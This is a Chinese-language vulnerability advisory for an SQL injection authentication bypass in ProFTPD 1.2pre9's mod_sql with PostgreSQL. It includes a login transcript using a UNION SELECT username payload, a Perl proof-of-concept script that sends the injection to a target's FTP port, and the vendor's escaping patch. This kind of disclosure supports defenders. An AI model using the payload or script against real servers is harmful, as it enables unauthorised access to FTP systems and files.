ProFTPD SQL注入mod_sql漏洞发布时间:2003-06-19 更新时间:2003-06-25 严重程度:高 威胁程度:远程非授权文件存取 错误类型:输入验证错误 利用方式:服务器模式 BUGTRAQ ID:7974 受影响系统 ProFTPD Project ProFTPD 1.2 pre9详细描述 ProFTPD存在SQL注人攻击。 如果ProFTPD使用mod_sql模块进行PostgreSQL数据库操作,由于对用户提供给用户名和密码的数据缺少充分过滤,提交恶意SQL命令可绕过验证,直接访问FTP服务器。 测试代码 Name (localhost:runlevel): ')UNION SELECT 'u','p',1001,1001,'/tmp','/bin/bash' WHERE(''=' 331 Password required for ')UNION. Password: 230 User ')UNION SELECT 'u','p',1001,1001,'/tmp' ,'/bin/bash' WHERE(''=' logged in. ----------------------------------------------------------------- #!/usr/bin/perl # Sql inject on ProFTPD with mod_sql proof of concept script # runlevel [ runlevel@raregazz.org ] # Spain, 2003 use IO::Socket; if(@ARGC<2){ print "\nProof Of Concept Sql Inject on ProFTPD\n"; print "Usage: perl poc-sqlftp <target> [1=Alternate query]\n\n"; exit(0); }; $server = $ARGV[0]; $query = $ARGV[1]; $remote = IO::Socket::INET->new(Proto=>"tcp",PeerAddr=>$server,PeerPort=>"21",Reuse=>1) or die "Can't connect. \n"; if(defined($line=<$remote>)){ print STDOUT $line; } # Proof of concept query, it may change on the number of rows # By default, it can query User, Pass, Uid, Gid, Shell or # User, Pass, Uid, Gid, Shell, Path, change the union query... if($query eq "1"){ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/tmp','/bin/bash'WHERE(''='\n"; }else{ print $remote "USER ')UNION SELECT'u','p',1002,1002,'/bin/bash' WHERE(''='\n"; }; if(defined($line=<$remote>)){ print STDOUT $line; } print $remote "PASS p\n"; if(defined($line=<$remote>)){ print STDOUT $line; } print "Sent query to $ARGV[0]\n"; if($line =~ /230/){ #logged in print "[------- Sql Inject Able \n"; }else{ print "[------- Sql Inject Unable \n"; } close $remote; 解决方案 相关补丁如下,此补丁需要PostgreSQL高于7.2版本: Index: contrib/mod_sql_postgres.c =================================================================== RCS file: /cvsroot/proftp/proftpd/contrib/mod_sql_postgres.c,v retrieving revision 1.15 diff -u -r1.15 mod_sql_postgres.c --- contrib/mod_sql_postgres.c 29 May 2003 07:29:43 -0000 1.15 +++ contrib/mod_sql_postgres.c 17 Jun 2003 20:52:30 -0000 @@ -1105,23 +1105,13 @@ conn = (db_conn_t *) entry->data; /* Note: the PQescapeString() function appeared in the C API as of - * Postgres-7.2; this macro allows for functioning with older postgres - * installations. Unfortunately, Postgres' PG_VERSION is defined as - * a string, not an actual number, which makes for preprocessor-time checking - * of that value much harder. - * - * Ideally, this function could be detected by a configure script, but - * ProFTPD does not yet support per-module configure scripts. + * Postgres-7.2. */ -#ifndef POSTGRES_NO_PQESCAPESTRING unescaped = cmd->argv[1]; escaped = (char *) pcalloc(cmd->tmp_pool, sizeof(char) * (strlen(unescaped) * 2) + 1); PQescapeString(escaped, unescaped, strlen(unescaped)); -#else - escaped = cmd->argv[1]; -#endif sql_log(DEBUG_FUNC, "%s", "exiting \tpostgres cmd_escapestring"); return mod_create_data(cmd, (void *) escaped); 相关信息 参考:http://www.securityfocus.com/bid/7974 http://www.securityfocus.com/advisories/5517 |
